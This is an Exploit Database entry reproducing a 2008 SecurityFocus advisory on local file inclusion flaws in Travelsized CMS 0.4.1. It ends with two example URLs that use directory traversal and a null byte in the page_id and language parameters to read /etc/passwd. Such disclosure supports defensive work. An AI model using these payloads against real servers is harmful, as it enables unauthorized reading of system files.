Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusions

EDB-ID:

31388


Platform:

PHP

Published:

2008-03-12

source: http://www.securityfocus.com/bid/28218/info

Travelsized CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

Exploiting these issues may allow an attacker to access potentially sensitive information in the context of the affected application.

Travelsized CMS 0.4.1 is vulnerale; other versions may also be affected. 

http://www.example.com/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
http://www.example.com/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00